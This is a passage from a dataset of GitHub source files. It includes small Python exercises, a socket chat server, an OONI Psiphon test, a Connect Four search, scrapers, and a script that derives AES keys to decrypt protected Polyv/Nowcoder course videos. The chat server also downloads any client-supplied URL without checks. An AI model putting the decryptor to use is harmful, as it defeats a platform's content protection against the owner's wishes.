1978.55)\nth_2 = Thing('Книга', 1500, 256)\ndict_things = DictShop()\ndict_things[th_1] = th_1\ndict_things[th_2] = th_2\nprint(dict_things.__dict__)\n\nfor x in dict_things:\n    print(x.name)\n\ndict_things[1] = th_1  # raises a TypeError","repo_name":"Grino777/OOP_Python","sub_path":"inheritance/4.2.4.py","file_name":"4.2.4.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36872509159","text":"import requests\nimport os\nimport socket\nimport threading\n\n\n\nfrom telegram import envia_msg_telegram\nfrom log import registra_log\nfrom servidor import clients\nfrom rss_config import noticia_rss\n\n\n\ndef comandos(client_socket, address):\n    try:\n        # Notify Telegram about the new connection\n        message = f\"Nova conexão: Cliente {address[0]}:{address[1]} conectado.\"\n        envia_msg_telegram(message)\n        registra_log(\"INFO\", address, \"Conexão\", message=message)\n        history = []  # list that stores this client's command history\n        while True:\n            data = client_socket.recv(1024).decode('utf-8')\n            if not data:\n                print(f\"Cliente {address[0]}:{address[1]} desconectado.\")\n                break\n\n            if data == \"/q\":\n                print(f\"Cliente {address[0]}:{address[1]} solicitou desconexão.\")\n                registra_log(\"INFO\", address, \"solicitação\", message=\"Solicitou desconexão\")\n                break\n            elif data == \"/l\":\n                print(f\"Cliente {address[0]}:{address[1]} solicitou listar clientes.\")\n                registra_log(\"INFO\", address, \"solicitação\", message=\"Solicitou Listar Clientes\")\n                response = \"\\n\".join(f\"{addr[0]}:{addr[1]}\" for addr in clients.keys())\n                client_socket.send(response.encode('utf-8'))\n            elif data.startswith(\"/m:\"):\n                parts = data.split(\":\", 3)\n                if len(parts) == 4:\n                    _, dest_ip, dest_port, message = parts\n                    dest_port = int(dest_port)\n                    envia_msg(address, dest_ip, dest_port, message)\n                    response = f\"Mensagem enviada para {dest_ip}:{dest_port}.\"\n                    registra_log(\"INFO\", address, \"Mensagem\", message=f\"{message} Enviada para {dest_ip}:{dest_port}\")\n                else:\n                    response = \"Comando /m inválido. Uso correto: /m:ip_destino:porta:mensagem\"\n                client_socket.send(response.encode('utf-8'))\n            elif data.startswith(\"/b:\"):\n                message = data[3:]\n                msg_geral(address, message)\n                msglog = message\n                response = \"Mensagem enviada para todos os clientes conectados.\"\n                registra_log(\"INFO\", address, \"Mensagem\", message=f\"Mensagem {msglog} Enviada para todos\")\n                client_socket.send(response.encode('utf-8'))\n            elif data == \"/h\":\n                response = \"\\n\".join(history)  # send the history back to the client\n                registra_log(\"INFO\", address, \"Solicitação\", message=\"Solicitou Historico\")\n                client_socket.send(response.encode('utf-8'))\n            elif data == \"/?\":\n                response = \"Comandos disponíveis:\\n/q - Desconectar\\n/l - Listar clientes conectados\\n/m:ip_destino:porta:mensagem - Enviar mensagem privada\\n/b:mensagem - Enviar mensagem para todos\\n/h - Ver histórico\\n/? 
- Ajuda\\n/rss:palavra_chave - Listar as 10 notícias mais recentes com a palavra-chave em RSS\\n/f - Listar arquivos na pasta /server_files\\n/w:url - Fazer download do arquivo da URL para a pasta /server_files\\n/d:nome_arquivo - Fazer download do arquivo do servidor para o cliente\"\n                client_socket.send(response.encode('utf-8'))\n            elif data.startswith(\"/rss:\"):\n                registra_log(\"INFO\", address, \"Mensagem\", message=\"Solicitou Noticias\")\n                keyword = data[5:]\n                news = noticia_rss(keyword)\n                if news:\n                    response = \"\\n\".join(news)\n                else:\n                    response = f\"Nenhuma notícia encontrada com a palavra-chave: {keyword}\"\n                client_socket.send(response.encode('utf-8'))\n            elif data.startswith(\"/w:\"):\n                registra_log(\"INFO\", address, \"Mensagem\", message=\"Solicitou Dowload\")\n                url = data[3:]\n                baixar_url(url)\n                response = f\"Arquivo da URL {url} baixado e salvo em /server_files.\"\n                client_socket.send(response.encode('utf-8'))\n            elif data == \"/f\":\n                registra_log(\"INFO\", address, \"Mensagem\", message=\"Solicitou lista de arquivos do servidor\")\n                response = listar_arqv()\n                client_socket.send(response.encode('utf-8'))\n            else:\n                response = \"Comando inválido. Use '/q' para desconectar, '/l' para listar clientes, '/m:ip_destino:porta:mensagem' para enviar uma mensagem privada, '/b:mensagem' para enviar uma mensagem para todos, '/h' para ver o histórico, '/?' para ver os comandos disponíveis, '/rss:palavra_chave' para listar as 10 notícias mais recentes com a palavra-chave em RSS, '/f' para listar os arquivos na pasta /server_files, '/w:url' para fazer download de um arquivo da URL fornecida ou '/d:nome_arquivo' para fazer download de um arquivo do servidor para o cliente.\"\n                client_socket.send(response.encode('utf-8'))\n\n            # Add the command/message to this client's history\n            history.append(data)\n    except Exception as e:\n        print(f\"Erro na conexão com {address[0]}:{address[1]}: {e}\")\n    finally:\n        client_socket.close()\n        del clients[address]\n\n\n\ndef envia_msg(sender_address, dest_ip, dest_port, message):\n    try:\n        if (dest_ip, dest_port) in clients:\n            dest_socket = clients[(dest_ip, dest_port)]\n            dest_socket.send(f\"Mensagem de {sender_address[0]}:{sender_address[1]}: {message}\".encode('utf-8'))\n        else:\n            raise Exception(f\"Cliente {dest_ip}:{dest_port} não encontrado.\")\n    except Exception as e:\n        print(f\"Erro ao enviar mensagem para {dest_ip}:{dest_port}: {e}\")\n\ndef msg_geral(sender_address, message):\n    # compare addresses (the dict keys), not sockets, so the sender is actually skipped\n    for addr, client_socket in clients.items():\n        if addr != sender_address:\n            client_socket.send(f\"Mensagem de {sender_address[0]}:{sender_address[1]} para todos: {message}\".encode('utf-8'))\n\n\n\n\n\"\"\"\n    Download a file from a URL and save it to the /server_files folder.\n\n    Parameters:\n    url (str): the URL of the file to download.\n\n    This function uses the requests library to fetch the file from the URL\n    and saves it to /server_files under the name taken from the end of the URL.\n\"\"\"\ndef baixar_url(url):\n    try:\n        response = requests.get(url)\n        if response.status_code == 200:\n            file_name = url.split(\"/\")[-1]\n            file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"server_files\", file_name)\n            with open(file_path, \"wb\") as file:\n                file.write(response.content)\n        else:\n            print(f\"Erro ao fazer download do arquivo da URL: {url}. 
Código de resposta: {response.status_code}\")\n    except Exception as e:\n        print(f\"Erro ao fazer download do arquivo da URL: {url}: {e}\")\n\n\n\n\"\"\"\n    List the files (name and size) contained in the server's /server_files folder.\n\n    This function uses the os library to enumerate the files in /server_files.\n    For each file found it collects the file's name and size, and the entries\n    are returned as one \"name - size bytes\" line per file.\n\"\"\"\ndef listar_arqv():\n    files_list = []\n    folder_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"server_files\")\n    if os.path.exists(folder_path) and os.path.isdir(folder_path):\n        for file_name in os.listdir(folder_path):\n            file_path = os.path.join(folder_path, file_name)\n            if os.path.isfile(file_path):\n                file_size = os.path.getsize(file_path)\n                files_list.append(f\"{file_name} - {file_size} bytes\")\n    if files_list:\n        return \"\\n\".join(files_list)\n    return \"Nenhum arquivo encontrado na pasta /server_files.\"\n\n\n\ndef start_server():\n    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    server_socket.bind(('0.0.0.0', 8888))\n    server_socket.listen(5)\n    print(\"Servidor iniciado. Aguardando conexões...\")\n\n    while True:\n        client_socket, address = server_socket.accept()\n        print(f\"Cliente {address[0]}:{address[1]} conectado.\")\n        clients[address] = client_socket\n        client_handler = threading.Thread(target=comandos, args=(client_socket, address))\n        client_handler.start()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mizaelarthur/Programacao-para-redes","sub_path":"ProjetoProgRedes/comunicação_cliente.py","file_name":"comunicação_cliente.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23725459694","text":"# Initialize the fatorial variable to 1 and read the machine's current minutes from the user:\nfatorial = 1\ncontador = int(input(\"Digite os minutos atuais da máquina: \"))\n\n# Run a while loop that multiplies into fatorial and decrements contador by 1\n# for as long as contador is greater than zero:\nwhile contador > 0:\n    fatorial *= contador\n    contador -= 1\n\n# Print the output with the password:\nprint(f\"\\nLIBERDADE{fatorial}\")\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"fiap/atividades/fase_2_prototyping/cap_3_andar_em_circulos/RM99070_EX04.py","file_name":"RM99070_EX04.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"7577551095","text":"import tempfile\nimport os\nimport sys\n\nfrom twisted.internet import defer, reactor\nfrom twisted.internet.error import ProcessExitedAlready\nfrom twisted.python import usage\n\nfrom ooni.utils import log, net\nfrom ooni.templates import process, httpt\n\n\nclass UsageOptions(usage.Options):\n    optParameters = [\n        ['psiphonpath', 'p', None, 'Specify psiphon python client path.'],\n        ['url', 'u', net.GOOGLE_HUMANS[0],\n         'Specify the URL to fetch over psiphon (default: http://www.google.com/humans.txt).'],\n        ['expected-body', 'e', net.GOOGLE_HUMANS[1],\n         'Specify the beginning of the expected body in the response (default: ' + net.GOOGLE_HUMANS[1] + ').']\n    ]\n\nclass PsiphonTest(httpt.HTTPTest, process.ProcessTest):\n\n    \"\"\"\n    This class tests the Psiphon python client\n\n    test_psiphon:\n      Starts Psiphon and checks that it bootstraps successfully\n      (by printing a line in 
stdout).\n Then, perform an HTTP request using the proxy\n \"\"\"\n\n name = \"Psiphon Test\"\n description = (\"Bootstraps Psiphon and \"\n \"does a HTTP GET for the specified URL.\")\n author = \"juga\"\n version = \"0.2.0\"\n timeout = 120\n usageOptions = UsageOptions\n\n def _setUp(self):\n self.localOptions['socksproxy'] = '127.0.0.1:1080'\n super(PsiphonTest, self)._setUp()\n\n def setUp(self):\n log.debug('PsiphonTest.setUp')\n\n self.report['bootstrapped_success'] = None\n self.report['request_success'] = None\n self.report['psiphon_found'] = None\n self.report['default_configuration'] = True\n\n self.bootstrapped = defer.Deferred()\n self.url = self.localOptions['url']\n\n if self.localOptions['url'] != net.GOOGLE_HUMANS[0]:\n self.report['default_configuration'] = False\n\n if self.localOptions['expected-body'] != net.GOOGLE_HUMANS[1]:\n self.report['default_configuration'] = False\n\n if self.localOptions['psiphonpath']:\n self.psiphonpath = self.localOptions['psiphonpath']\n else:\n # Psiphon is not installable and to run it manually, it has to be\n # run from the psiphon directory, so it wouldn't make sense to\n # install it in the PATH. For now, we assume that Psiphon sources\n # are in the user's home directory.\n from os import path, getenv\n self.psiphonpath = path.join(\n getenv('HOME'), 'psiphon-circumvention-system/pyclient/pyclient')\n log.debug('psiphon path: %s' % self.psiphonpath)\n\n def createCommand(self):\n # psi_client.py can not be run directly because the paths in the\n # code are relative, so it'll fail to execute from this test\n x = \"\"\"\nfrom psi_client import connect\nconnect(False)\n\"\"\"\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(x)\n f.close()\n self.command = [sys.executable, f.name]\n log.debug('command: %s' % ' '.join(self.command))\n\n def handleRead(self, stdout, stderr):\n if 'Press Ctrl-C to terminate.' in self.processDirector.stdout:\n if not self.bootstrapped.called:\n # here the text 'Press Ctrl-C to terminate.' 
has been found\n                # and it is time to call doRequest\n                self.report['bootstrapped_success'] = True\n                log.debug(\"PsiphonTest: calling bootstrapped.callback\")\n                self.bootstrapped.callback(None)\n\n    def test_psiphon(self):\n        log.debug('PsiphonTest.test_psiphon')\n        self.createCommand()\n        if not os.path.exists(self.psiphonpath):\n            log.err('psiphon path does not exist, is it installed?')\n            self.report['psiphon_found'] = False\n            log.debug(\"Adding %s to report\" % self.report)\n            # XXX: the original code written by juga0 read\n            # > return defer.succeed(None)\n            # but this caused `ooniprobe -ng` to hang forever, so I\n            # rewrote the code to return a deferred and simulate calling\n            # its callback method, to trigger an event.\n            # -sbs\n            reactor.callLater(0.0, self.bootstrapped.callback, None)\n            return self.bootstrapped\n\n        self.report['psiphon_found'] = True\n        log.debug(\"Adding %s to report\" % self.report)\n\n        # Using a pty to see output lines as soon as they are written to the\n        # buffer; otherwise the test might not see lines until the buffer is\n        # full up to some block size, and the test would\n        # terminate with an error\n        finished = self.run(self.command,\n                            env=dict(PYTHONPATH=self.psiphonpath),\n                            path=self.psiphonpath,\n                            usePTY=1)\n        # here the psiphon command has been run, and if handleRead finds the text\n        # 'Press Ctrl-C to terminate' it will write\n        # self.report['bootstrapped_success'] = True to the report\n        self.report['bootstrapped_success'] = False\n\n        def callDoRequest(_):\n            log.debug(\"PsiphonTest.callDoRequest: %r\" %(_,))\n            d = self.doRequest(self.url)\n            def addSuccessToReport(res):\n                log.debug(\"PsiphonTest.callDoRequest.addSuccessToReport\")\n                if res.body.startswith(self.localOptions['expected-body']):\n                    self.report['request_success'] = True\n                else:\n                    self.report['request_success'] = False\n\n                return res\n            d.addCallback(addSuccessToReport)\n            def addFailureToReport(res):\n                log.debug(\"PsiphonTest.callDoRequest.addFailureToReport. 
res=%r\" % (res,))\n self.report['request_success'] = False\n return res\n d.addErrback(addFailureToReport)\n return d\n self.bootstrapped.addCallback(callDoRequest)\n\n def cleanup(_):\n log.debug('PsiphonTest:cleanup')\n try:\n self.processDirector.transport.signalProcess('INT')\n except ProcessExitedAlready:\n pass\n os.remove(self.command[1])\n return finished\n\n self.bootstrapped.addBoth(cleanup)\n return self.bootstrapped\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/nettests/third_party/psiphon.py","file_name":"psiphon.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"45028043085","text":"import time\nimport math\nimport random\nfrom typing import List, Optional, Union\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nfrom .c4_board import C4Board\n\n\nclass C4Node:\n def __init__(self, input_board: C4Board, parent: Optional[\"C4Node\"] = None):\n self.board: C4Board = input_board\n self.parent: Optional[\"C4Node\"] = parent\n self.children: List[\"C4Node\"] = []\n self.wins: int = 0\n self.visits: int = 0\n\n def add_child(self, child_node) -> None:\n self.children.append(child_node)\n\n def update(self, result) -> None:\n self.visits += 1\n self.wins += result\n\n def fully_expanded(self) -> bool:\n return len(self.children) == len(self.board.get_next_possible_moves())\n\n def best_child(self, c_param: Union[int, float] = 1.4) -> Optional[\"C4Node\"]:\n best_score = float(\"-inf\")\n best_child = None\n for child in self.children:\n if child.visits == 0:\n child_score = float(\"inf\")\n else:\n child_score = float(\n (child.wins / child.visits)\n + c_param * ((2 * math.log(self.visits) / child.visits) ** 0.5)\n )\n if child_score > best_score:\n best_score = child_score\n best_child = child\n if best_child is None: # TODO: replace with logging\n message = len(self.children)\n raise Exception(\"No best child found. 
Children: \" + str(message))\n return best_child\n\n\nclass C4MCTreeSearch:\n def __init__(self, input_board: C4Board):\n self.root = C4Node(input_board)\n\n def selection(self) -> Optional[C4Node]:\n current_node = self.root\n while current_node.fully_expanded():\n if len(current_node.board.get_next_possible_moves()) == 0:\n return None\n node = current_node.best_child()\n if node is None: # to satisfy mypy\n return None\n current_node = node\n return current_node\n\n def expansion(self, node: C4Node):\n possible_moves = node.board.get_next_possible_moves()\n for move in possible_moves:\n next_board = node.board.with_move(move, node.board.get_next_player())\n child_node = C4Node(next_board, node)\n node.add_child(child_node)\n\n def simulation(self, node: C4Node):\n current_board = node.board\n while current_board.get_winner() is None:\n move = random.choice(current_board.get_next_possible_moves())\n current_board = current_board.with_move(\n move, current_board.get_next_player()\n )\n winner = current_board.get_winner()\n agent_to_make_move = self.root.board.get_next_player()\n if winner == agent_to_make_move:\n return 1\n if winner == \" \":\n return 0\n return -1\n\n def backpropagation(self, node, result):\n while node is not None:\n node.update(result)\n node = node.parent\n\n def run_simulation(self):\n selected_node = self.selection()\n if selected_node is None:\n return\n self.expansion(selected_node)\n result = self.simulation(selected_node)\n self.backpropagation(selected_node, result)\n\n def run(self, iterations, num_threads=4):\n with ThreadPoolExecutor(max_workers=num_threads) as executor:\n for _ in range(iterations):\n executor.submit(self.run_simulation)\n return self.root.best_child().board\n\n\nif __name__ == \"__main__\":\n board = C4Board((6, 7), \"11 22\" + \" \" * 36)\n mcts = C4MCTreeSearch(board)\n start_time = time.time()\n new_board = mcts.run(1000)\n end_time = time.time()\n print(\"Time to run: \", end_time - start_time)\n print(board.find_move_position(new_board.state))\n print(new_board.state.replace(\" \", \"_\"))\n \"\"\"for child in mcts.root.children:\n print(\n \"Board:\",\n child.board.state.replace(\" \", \"_\"),\n \"wins:\",\n child.wins,\n \" visits:\",\n child.visits,\n )\"\"\"\n","repo_name":"Nootonium/AIPlaymaker","sub_path":"src/connect_four/c4_mcts.py","file_name":"c4_mcts.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26659426618","text":"import asyncio\nimport websockets\nimport pathlib\nimport ssl\n\nssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\nlocalhost_pem = pathlib.Path(__file__).with_name(\"localhost.pem\")\nssl_context.load_verify_locations(localhost_pem)\n\nasync def hola():\n uri = \"wss://localhost:8888\"\n async with websockets.connect(uri, ssl=ssl_context) as websocket:\n nombre = input('Dime tu nombre:')\n\n await websocket.send(nombre)\n print(f\">>>{nombre}\")\n\n saludo = await websocket.recv()\n print(f\"<<< {saludo}\")\n\nif __name__ == \"__main__\":\n asyncio.run(hola())","repo_name":"jgomcar115/practs-ipra","sub_path":"vidic-main/CODE/test_websocket/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43433685515","text":"import asyncio\nimport aiohttp\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport multiprocessing as mp\nimport re\nimport time\nimport 
random\n\nurls = [\"https://movie.douban.com/top250?start={}&filter=\".format(str(i*25)) for i in range(0,10)]\nheaders = {'User-Agent':'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'}\ncount = 1\n\nasync def get_page(url, session):\n    res = await session.get(url, headers = headers)\n    html = await res.text()\n    return html\n\ndef parse(html):\n    soup = bs(html, 'lxml')\n    titles = [s.string for s in soup.find_all('span', class_= 'title')]\n    ratings = [s.string for s in soup.find_all('span', class_='rating_num')]\n    return titles, ratings\n\nasync def main(loop):\n    pool = mp.Pool()\n    async with aiohttp.ClientSession() as session:\n        print('Getting htmls from Douban')\n        # create the tasks, but do not run them yet\n        tasks = [loop.create_task(get_page(url, session)) for url in urls]\n        # run the tasks, wait until all of them finish, and collect them into finished\n        finished, unfinished = await asyncio.wait(tasks)\n        # pull the results out of finished and store them in htmls\n        htmls = [h.result() for h in finished]\n\n        print('Start Parsing...')\n        parse_jobs = [pool.apply_async(parse, args=(html,)) for html in htmls]\n        results = [i.get() for i in parse_jobs]\n\nif __name__ == '__main__':\n    t1 = time.time()\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(main(loop))\n    loop.close()\n    print('Time Consumed: ', time.time()- t1)\n\n\n\n\n\n","repo_name":"WangShizhu-08/pythons","sub_path":"douban250_test.py","file_name":"douban250_test.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1589893495","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport logging\nimport inspect\nimport re\nimport hashlib\nimport copy\nimport base64\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nfrom m3u8downloader.downloader import M3U8Downloader\n\ndef decryptTS(tsfile, resultfile, keyfile, ivfile):\n    video = None\n    key = None\n    iv = None\n\n    with open(tsfile, 'rb') as f:\n        video = f.read()\n\n    key_file_name = os.path.join(currentFolder, keyfile)\n    with open(key_file_name, 'rb') as f:\n        key = f.read()\n\n    iv_file_name = os.path.join(currentFolder, ivfile)\n    with open(iv_file_name, 'rb') as f:\n        iv1 = f.read()\n\n    video_id_name = os.path.join(currentFolder, \"tmp1/video_id\")\n    with open(video_id_name, 'r') as f:\n        video_id = f.read()\n\n    body = getBody(video_id)\n    json = decryptVideoJson(video_id, body)\n    json = str(json, encoding = \"utf8\")\n    regex = re.compile(r'seed_const\":.*?,')\n    seed_const = regex.findall(json)[0][12:-1]\n    m2 = hashlib.md5()\n    m2.update(seed_const.encode('utf-8'))\n    i = m2.hexdigest()\n    i = i[0:16]\n    i = bytes(i, encoding=\"utf8\")\n    iv = [1, 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 7, 5, 3, 2, 1]\n    iv = bytes(iv)\n    key = downloader.decrypt(i, iv, key)[0:16]\n    iv =[182, 225, 80, 143, 231, 211, 167, 164, 71, 64, 110, 174, 127, 230, 89, 117]\n    iv = bytes(iv)\n    result = downloader.decrypt(key, iv, video)\n    with open(resultfile, 'wb') as f:\n        f.write(result)\n\ndef b(e,t=None):\n    if t == None or t.lower().replace(\" \",\"\").replace(\"-\",\"\") == \"utf8\":\n        i = []\n        r = 0\n        while(r < len(e)):\n            n = ord(e[r:r+1])\n            if n == 37:\n                n = hex(int(e[r:r+2]))\n                i.append(n)\n            else:\n                i.append(n)\n            r += 1\n        return i\n    elif t.lower() == \"hex\":\n        i = []\n        r = 0\n        while (r < len(e)):\n            n = ord(e[r:r + 1])\n            n = hex(int(e[r:r + 2]))\n            i.append(n)\n            r += 1\n        return i\n    else:\n        i = []\n        return i\n    \ndef funa(e):\n    \"\"\"convert each pair of hex digits into one decimal byte value\"\"\"\n    t = []\n    i = 0\n    dic = {\"0\":0,\n           \"1\":1,\n           \"2\":2,\n           \"3\":3,\n           \"4\":4,\n           \"5\":5,\n           \"6\":6,\n           \"7\":7,\n           \"8\":8,\n           \"9\":9,\n           
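# hex digits a-f map to the values 10-15\n           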
\"a\":10,\n \"b\":11,\n \"c\":12,\n \"d\":13,\n \"e\":14,\n \"f\":15}\n while i < len(e):\n a = dic[e[i]]\n b = dic[e[i+1]]\n t.append(a*16+b)\n i += 2\n return t\n\n# download video info and we will find the key which will be used to descrypt key for TS file\ndef getBody(video_id):\n content = downloader.download(\"https://player.polyv.net/secure/\" + video_id + \".json\")\n content = str(content)\n regex = re.compile(r'body\": \".*\"')\n content = regex.findall(content)[0][8:-1]\n return content\n\n# decrypt the video info we will find the key which will be used to descrypt key for TS file\ndef decryptVideoJson(video_id, body):\n t = video_id\n m2 = hashlib.md5()\n m2.update(t.encode('utf-8'))\n i = m2.hexdigest()\n r = b(i[0:16])\n r = bytes(r)\n n = b(i[16:32])\n n = bytes(n)\n a = funa(body)\n a = bytes(a)\n result = downloader.decrypt(r,n,a)\n result = base64.b64decode(result)\n return result\n\nif __name__ == '__main__':\n LOG_LEVEL = logging.INFO\n log = logging.getLogger()\n log.setLevel(LOG_LEVEL)\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(LOG_LEVEL)\n formatter = logging.Formatter('%(asctime)s - %(module)s.%(funcName)s:%(lineno)d - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n log.addHandler(handler)\n\n downloader = M3U8Downloader(log)\n downloader.setHeaders({\n \"Origin\": \"https://www.nowcoder.com\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\",\n \"Referer\": \"https://www.nowcoder.com/study/vod/1041/1/1\"\n })\n\n currentFolder = os.path.dirname(os.path.realpath(__file__))\n keyfile = \"tmp1/c7d3982d0d4360a289c58754dbdfd80f_2_0.key\"\n ivfile = \"tmp1/c7d3982d0d4360a289c58754dbdfd80f_2_0.iv\"\n ls = []\n for filename in os.listdir(os.path.join(currentFolder, \"tmp1\")):\n if(filename.endswith(\".ts\")):\n file_name = os.path.join(currentFolder, \"tmp1/\"+filename)\n r1 = os.path.join(currentFolder, \"10/\"+filename)\n decryptTS(file_name, r1, keyfile, ivfile)\n ls.append(r1)\n\n downloader.combineTS(ls, \"10.ts\")","repo_name":"jamesliu668/m3u8-downloader","sub_path":"test/newcoder-decryptor-test.py","file_name":"newcoder-decryptor-test.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"25794255254","text":"import\tcv2 \nimport\tnumpy\tas\tnp\n\n#DUVIDAS: tentativa e erro? teria um jeito mais facil?\n# como selecionar o machucado da folha?\n#dessa forma é somente um pixel fixo? seria necessario criar um\n#algoritmo q calculasse essa função sozinho?\n\nimagemOriginal = cv2.imread(\"imagemTeste.jpg\", 0)\n\nimgEscalada\t=\tcv2.resize( \n imagemOriginal,\t\n None,\t\n fx\t= 0.5,\t\n fy\t= 0.5, \n interpolation\t=\tcv2.INTER_CUBIC \n )\n\n#objeto de interesse destacado em branco \nmetodo\t=\tcv2.THRESH_BINARY_INV \n\nret, imgBinarizada\t=\tcv2.threshold(imgEscalada,\t135,\t255,\tmetodo)\n\ncv2.imshow(\"Imagem\tOriginal\",\timgEscalada) \ncv2.imshow(\"Imagem\tTratada\",\timgBinarizada)\n\ncv2.waitKey(0) \ncv2.destroyAllWindows()","repo_name":"ThayDias/visao-computacional","sub_path":"Introducao a Visao Computacional/9. 
Segmentacao de Objetos/segmentacao_binarizacao.py","file_name":"segmentacao_binarizacao.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2096875108","text":"from pyspark.sql import SparkSession\nfrom secrete import bucket_prices, bucket_parquet, host\nfrom connect_s3 import save_to_bucket\nfrom api_18080 import check_stages, check_jobs\n\n\ndef quiet_logs(spark):\n logger = spark._jvm.org.apache.log4j\n logger.LogManager.getLogger(\"org\").setLevel(logger.Level.ERROR)\n logger.LogManager.getLogger(\"akka\").setLevel(logger.Level.ERROR)\n\n\ndef convert_files(from_bucket, from_file, to_bucket, to_file, app_name):\n spark = SparkSession.builder \\\n .appName(app_name) \\\n .config('spark.sql.files.maxPartitionBytes', 1024 * 1024 * 128) \\\n .config('spark.sql.shuffle.partitions', 700) \\\n .getOrCreate()\n quiet_logs(spark)\n\n # read in all csv files from this bucket, convert to a single df\n df = spark.read.csv(\"s3a://\" + from_bucket + \"/\" + from_file, header=True)\n # df.drop('open', 'close', 'volume', 'high', 'low')\n df.write.parquet(\"s3a://\" + to_bucket + \"/\" + to_file, mode=\"overwrite\")\n\n # save history log to S3 bucket\n app_id = spark.sparkContext.applicationId\n get_history(app_id)\n\n\ndef get_history(app_id):\n path = 'http://{}:18080/api/v1/applications/'.format(host)\n if check_jobs(path, app_id,'jobs') == 'ok':\n sms = 'Congrats! All jobs succeeded!'\n print(sms)\n else:\n print('Ohh, sorry! Something went wrong, please check the logs.')\n save_to_bucket(check_stages(path, app_id, 'stages'), \"log_\"+app_id)\n\n\nif __name__ == '__main__':\n convert_files(bucket_prices, \"historical_stock_prices.csv\", bucket_parquet, \"prices.parquet\", 'convert historical prices to parquet')","repo_name":"mingyyy/backtesting","sub_path":"spark/file_convertor.py","file_name":"file_convertor.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21029848309","text":"# map, filter , lambda\n\n\npeople = [\n {'name': 'bob', 'age': 20},\n {'name': 'carry', 'age': 38},\n {'name': 'john', 'age': 7},\n {'name': 'smith', 'age': 17},\n {'name': 'ben', 'age': 27},\n {'name': 'bobby', 'age': 57},\n {'name': 'red', 'age': 32},\n {'name': 'queen', 'age': 25}\n]\n\nresult3 = filter(lambda x: x['age'] > 20, people)\n\nprint(result3)\n\ndef check_adult(person):\n return \"adult \" if person['age'] >20 else \"teenager\"\n\n\nresult= map(check_adult,people)\nresult2= map(lambda person:(\"adult \" if person['age'] >20 else \"teenager\"), people)\nprint(list(result2))\n\n","repo_name":"skylermbang/Lectures-","sub_path":"codeit/python/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38646978522","text":"from fastai.core import *\r\nfrom fastai.vision import *\r\nfrom matplotlib.axes import Axes\r\nfrom .filters import IFilter, MasterFilter, ColorizerFilter\r\nfrom .generators import gen_inference_deep, gen_inference_wide\r\nfrom PIL import Image\r\nimport ffmpeg\r\nimport gc\r\nimport requests\r\nfrom io import BytesIO\r\nimport base64\r\nfrom IPython import display as ipythondisplay\r\nfrom IPython.display import HTML\r\nfrom IPython.display import Image as ipythonimage\r\nimport cv2\r\n\r\n\r\n\r\nclass ModelImageVisualizer:\r\n def __init__(self, filter: IFilter, 
results_dir: str = None):\r\n        self.filter = filter\r\n        \r\n\r\n    def plot_transformed_image(\r\n        self,\r\n        path: str,\r\n        figsize: Tuple[int, int] = (20, 20),\r\n        render_factor: int = None,\r\n        display_render_factor: bool = False,\r\n        compare: bool = False,\r\n        post_process: bool = True,\r\n    ) -> Path:\r\n        \r\n        img = cv2.imread(path)\r\n        orig_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n        orig_image = Image.fromarray(orig_image)\r\n        result = self.filter.filter(\r\n            orig_image, orig_image, render_factor=render_factor,post_process=post_process\r\n        )\r\n        # self._plot_solo(figsize, render_factor, display_render_factor, result)\r\n\r\n        return result\r\n\r\n    \r\n\r\ndef get_image_colorizer(\r\n    root_folder: Path = Path('./'), render_factor: int = 35, artistic: bool = True\r\n) -> ModelImageVisualizer:\r\n    if artistic:\r\n        return get_artistic_image_colorizer(root_folder=root_folder, render_factor=render_factor)\r\n    else:\r\n        return get_stable_image_colorizer(root_folder=root_folder, render_factor=render_factor)\r\n\r\n\r\ndef get_stable_image_colorizer(\r\n    root_folder: Path = Path('./'),\r\n    weights_name: str = 'ColorizeStable_gen',\r\n    results_dir='result_images',\r\n    